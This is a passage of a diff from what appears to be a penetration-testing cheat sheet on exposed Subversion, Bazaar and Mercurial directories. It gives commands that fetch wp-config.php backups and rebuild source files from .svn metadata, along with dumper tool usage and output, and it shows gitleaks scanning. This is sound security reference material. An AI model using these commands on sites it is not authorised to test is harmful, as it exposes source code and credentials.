docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
||||
|
||||
# Run gitleaks against a local repository already cloned into /tmp/
|
||||
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
||||
|
||||
# Run gitleaks against a specific Github Pull request
|
||||
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
|
||||
|
||||
or
|
||||
|
||||
go get -u github.com/zricethezav/gitleaks
|
||||
```
|
||||
|
||||
## Subversion
|
||||
|
||||
### Example (Wordpress)
|
||||
|
||||
```powershell
|
||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||
```
|
||||
|
||||
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
|
||||
```powershell
|
||||
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
||||
```
|
||||
2. Download interesting files
|
||||
* remove \$sha1\$ prefix
|
||||
* add .svn-base postfix
|
||||
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||
|
||||
|
||||
### Tools
|
||||
|
||||
#### svn-extractor
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/anantshri/svn-extractor.git
|
||||
python svn-extractor.py –url "url with .svn available"
|
||||
```
|
||||
|
||||
## Bazaar
|
||||
|
||||
### Tools
|
||||
|
||||
#### rip-bzr.pl
|
||||
|
||||
```powershell
|
||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
||||
```
|
||||
|
||||
#### bzr_dumper
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/SeahunOh/bzr_dumper
|
||||
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
|
||||
Created a standalone tree (format: 2a)
|
||||
[!] Target : http://127.0.0.1:5000/
|
||||
[+] Start.
|
||||
[+] GET repository/pack-names
|
||||
[+] GET README
|
||||
[+] GET checkout/dirstate
|
||||
[+] GET checkout/views
|
||||
[+] GET branch/branch.conf
|
||||
[+] GET branch/format
|
||||
[+] GET branch/last-revision
|
||||
[+] GET branch/tag
|
||||
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
|
||||
[*] Finish
|
||||
|
||||
$ bzr revert
|
||||
N application.py
|
||||
N database.py
|
||||
N static/
|
||||
```
|
||||
|
||||
## Mercurial
|
||||
|
||||
### Tools
|
||||
|
||||
#### rip-hg.pl
|
||||
|
||||
```powershell
|
||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
|
||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
|
||||
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
|
||||
- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
|
||||
- [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
|
40
Insecure Source Code Management/Subversion.md
Normal file
40
Insecure Source Code Management/Subversion.md
Normal file
@ -0,0 +1,40 @@
|
||||
# Subversion
|
||||
|
||||
## Summary
|
||||
|
||||
* [Examples](#examples)
|
||||
* [Tools](#tools)
|
||||
* [svn-extractor](#svn-extractor)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Examples
|
||||
|
||||
```powershell
|
||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||
```
|
||||
|
||||
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
|
||||
```powershell
|
||||
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
||||
```
|
||||
2. Download interesting files
|
||||
* remove \$sha1\$ prefix
|
||||
* add .svn-base postfix
|
||||
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### svn-extractor
|
||||
|
||||
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
|
||||
```powershell
|
||||
python svn-extractor.py --url "url with .svn available"
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/)
|
Loading…
Reference in New Issue
Block a user